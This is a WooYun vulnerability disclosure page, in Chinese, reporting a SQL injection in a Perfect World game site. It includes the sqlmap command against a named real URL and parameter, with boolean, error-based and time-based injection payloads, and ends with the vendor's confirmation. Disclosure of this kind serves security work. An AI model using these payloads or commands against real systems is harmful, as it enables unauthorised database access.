当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068689

漏洞标题:完美世界旗下某游戏存在SQL注入

相关厂商:完美时空

漏洞作者: Lonely

提交时间:2014-07-16 10:05

修复时间:2014-08-30 10:06

公开时间:2014-08-30 10:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-16: 细节已通知厂商并且等待厂商处理中
2014-07-17: 厂商已经确认,细节仅向厂商公开
2014-07-27: 细节向核心白帽子及相关领域专家公开
2014-08-06: 细节向普通白帽子公开
2014-08-16: 细节向实习白帽子公开
2014-08-30: 细节向公众公开

简要描述:

RT

详细说明:

C:\Python27\sqlmap>sqlmap.py -u "http://ls.laohu.com/db/main/filter?filter=cardtype%3D3"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 08:24:26
[08:24:26] [WARNING] using 'C:\Documents and Settings\Administrator\.sqlmap\outp
ut' as the output directory
[08:24:26] [INFO] resuming back-end DBMS 'mysql'
[08:24:26] [INFO] testing connection to the target URL
[08:24:27] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: filter
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: filter=cardtype=3' AND 4874=4874 AND 'oQsu'='oQsu
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: filter=cardtype=3' AND (SELECT 4527 FROM(SELECT COUNT(*),CONCAT(0x7
1636a7671,(SELECT (CASE WHEN (4527=4527) THEN 1 ELSE 0 END)),0x7170637371,FLOOR(
RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LDOz'='LD
Oz
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: filter=cardtype=3' AND SLEEP(5) AND 'XFts'='XFts
---
[08:24:27] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0

漏洞证明:

sqlmap.py -u "http://ls.laohu.com/db/main/filter?filter=cardtype%3D3"

1.jpg

修复方案:

版权声明:转载请注明来源 Lonely@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-07-17 11:08

厂商回复:

感谢洞主对完美世界的关注,我们会尽快修复漏洞。

最新状态:

暂无